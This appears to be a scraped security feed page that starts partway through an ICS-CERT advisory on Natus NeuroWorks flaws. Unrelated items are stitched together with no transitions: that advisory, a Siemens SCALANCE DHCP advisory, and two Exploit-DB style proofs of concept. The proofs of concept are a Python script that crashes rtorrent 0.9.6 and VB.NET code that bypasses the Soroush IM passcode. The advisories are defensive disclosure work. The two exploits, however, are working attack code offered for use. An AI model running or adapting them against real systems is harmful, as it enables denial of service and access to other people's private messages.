3.2.6    STACK-BASED BUFFER OVERFLOW CWE-121

A specially-crafted packet received during the execution of certain commands can cause memory to be overwritten in a way that could allow an attacker to take control of the program.

CVE-2017-2867 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.2.7    STACK-BASED BUFFER OVERFLOW CWE-121

An error in the way the program parses data structures may allow an attacker to take control of the system by sending it a specially-crafted packet.

CVE-2017-2868 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.2.8    STACK-BASED BUFFER OVERFLOW CWE-121

A specially-crafted packet takes advantage of the way the program parses data structures and may cause a buffer overflow, which may allow remote execution of arbitrary code.

CVE-2017-2869 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Healthcare and Public Health
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Pleasanton, California

3.4 RESEARCHER

Cory Duplantis from Cisco Talos discovered these vulnerabilities and reported them to Natus.

4. MITIGATIONS

Natus has released NeuroWorks/SleepWorks 8.5 GMA 3, a software update with security enhancements to address the vulnerabilities identified in NeuroWorks/SleepWorks 8.

A free software update to NeuroWorks/SleepWorks 8.5 GMA 3 is available to users using NeuroWorks/SleepWorks Version 8.0, 8.1, 8.4, or 8.5. Contact the Natus Neuro Technical support department at 1-800 387-7516 or email [email protected] for more details.

Natus recommends installing this update as quickly as possible on affected systems.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

rtorrent 0.9.6 Denial Of Service

# Exploit Title: rtorrent 0.9.6 – Denial of Service
# Date: 2018-01-10
# Exploit Author: ecx86
# Vendor Homepage: http://rtorrent.net
# Software Link: https://github.com/rakshasa/rtorrent/releases
# Version: <= 0.9.6
# Tested on: Debian GNU/Linux 9.4 (stretch)

# This crash is due to a bad bencode parse of the handshake data map.
# Specifically, by providing a massive length for a string, namely the key of a map entry,
# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
# client, or when a downloading rtorrent client connects to a malicious peer.

#!/usr/bin/env python
import socket
import struct

crash = ”
proto_name = ‘BitTorrent protocol’
crash += chr(len(proto_name)) + proto_name # magic
crash += ‘00000000’ # reserved extension bytes

# sha1 hash of info dictionary
# change this depending on your torrent
crash += ‘\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00’

crash += ‘00000000000000000000’ # peer id

msg = ”
msg += struct.pack(‘<H’, 20) # message type: extended
msg += ‘d99999999999999999999999999999999:’ # payload

crash += struct.pack(‘>I’, len(msg))
crash += msg

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘1.3.3.7’, 6890))
s.send(crash)
s.close()

Siemens SCALANCE X Switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C

1. EXECUTIVE SUMMARY

  • CVSS v3 7.5

  • ATTENTION: Exploitable from the same local network segment (OSI Layer 2)
  • Vendor: Siemens
  • Equipment: SCALANCE X switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C
  • Vulnerability: Permissions, Privileges, and Access Controls

2. RISK EVALUATION

By sending a specially-crafted DHCP response to a client’s DHCP request, an unprivileged remote attacker could execute arbitrary code.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Siemens reports the vulnerability affects the following products:

  • RFID 181-EIP: All versions,
  • RUGGEDCOM WiMAX: v4.4 and v4.5,
  • SCALANCE X-200: All versions prior to v5.2.3,
  • SCALANCE X-200 IRT: All versions prior to v5.4.1,
  • SCALANCE X-204RNA: All versions,
  • SCALANCE X-300: All versions,
  • SCALANCE X408: All versions,
  • SCALANCE X414: All versions, and
  • SIMATIC RF182C: All versions.

3.2 VULNERABILITY OVERVIEW

3.2.1    PERMISSIONS, PRIVILEGES, AND ACCESS CONTROLS CWE-264

Unprivileged remote attackers located in the same local network segment (OSI Layer 2) could gain remote code execution on the affected products by sending a specially-crafted DHCP response to a client’s DHCP request.

CVE-2018-4833 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Chemical, Energy, Food and Agriculture, Healthcare and Public Health, Transportation Systems, and Water and Wastewater Systems
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Dr. Ang Cui and Joseph Pantoga from Red Balloon Security reported this vulnerability to Siemens Product CERT.

4. MITIGATIONS

Siemens has provided updates for the following products to fix the vulnerability:

  • SCALANCE X-200: Update to v5.2.3

https://support.industry.siemens.com/cs/cn/en/view/109758142

  • SCALANCE X-200 IRT: Update to v5.4.1

https://support.industry.siemens.com/cs/de/en/view/109758144

Siemens has identified the following specific workarounds and mitigations that customers can apply to reduce the risk:

As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and following the recommendations in the product manuals.

Additional information on Industrial Security by Siemens can be found at:

https://www.siemens.com/industrialsecurity

For more information on this vulnerability and associated software updates, please see Siemens security advisory SSA-181018 on their website:

https://www.siemens.com/cert/advisories

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability. High skill level is needed to exploit.

Soroush IM Desktop App 0.15 Authentication Bypass

# Exploit Title: Soroush IM Desktop app 0.15 – Authentication Bypass
# Date: 2018-06-13
# Exploit Author: VortexNeoX64
# Vendor Homepage: https://soroush-app.ir
# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
# Version: 0.15 BETA
# Tested on: Windows 10 1803

# Security Issue:
# Attackers can unlock the client app installed on Windows OS(others?) without the passcode
# and access to all the files, chats, images, and etc.
# the attacker can then send, receive message of any kind on the behalf of the authorized user.

# PoC (.NET 4.0 Visual Basic)

”make sure before running this exploit the Soroush Messager window is NOT minimized
”adding InteropServices for DLLImport
Imports System.Runtime.InteropServices
Module Module1

”FindWindow API from user32.dll to get the window handler by lpWindowName
<DllImport(“user32.dll”, SetLastError:=True)>
Private Function FindWindow(lpClassName As String, lpWindowName As String) As IntPtr
End Function
”MoveWindow API from user32.dll to move and resize the window to trigger the bypass process
<DllImport(“user32.dll”, SetLastError:=True)> Private Function MoveWindow(hWnd As IntPtr, X As Integer, Y As Integer,
nWidth As Integer, nHeight As Integer, bRepaint As Boolean) As Boolean
End Function
Sub Main()
Try
Console.WriteLine(“<<<<<Soroush IM Desktop GUI misbehaviour leads to passcode bypass>>>>> “)
Console.WriteLine(“****** Developer: NeoVortex”)
Console.WriteLine(“****** Client Version 0.15 BETA”)
Console.WriteLine(“****** Tested on windows 10 1803”)
Console.WriteLine(“[****] Make sure the Messager windows is not minimized “)
Console.WriteLine(“[Press any key to start the exploit…]”)
Console.ReadKey()
Dim pss() As Process = Process.GetProcessesByName(“Soroush”)
Dim hWnd As IntPtr = FindWindow(Nothing, “Soroush”)
” check if the app is running
If (pss.Count > 0) Then
Console.WriteLine(“[****] Process found with id: ” & pss(0).Id)
Console.WriteLine(“[****] Process File ” & pss(0).MainModule.FileName)
Console.WriteLine(“[****] Resizing to trigger the vulnerability…..”)
” move and resize the window
MoveWindow(hWnd, 100, 100, 100, 100, True)
Console.WriteLine(“[****] Done”)
Console.WriteLine(“[****] Now close the Soroush messager windows via X button (NOT via system tray) , then reopen it “)
Console.WriteLine(“[****] Passcode will be bypassed! “)
” now you should close the exploit window and then close the Soroush messager window manually via X button(NOT FROM SYSTEM TRAY) because the Soroush messager window dose not support WM_CLOSE signal for the single window closing
”if anyone could close the GUI window without accually killing the app, he/she is welcome at gitub link below.
Else
”app is not ruuning
Console.WriteLine(“[—-]Process not found “)
End If
Console.ReadKey()

Catch ex As Exception
Beep()
MsgBox(ex.Message, 16)
Console.ReadKey()
End Try
End Sub

End Module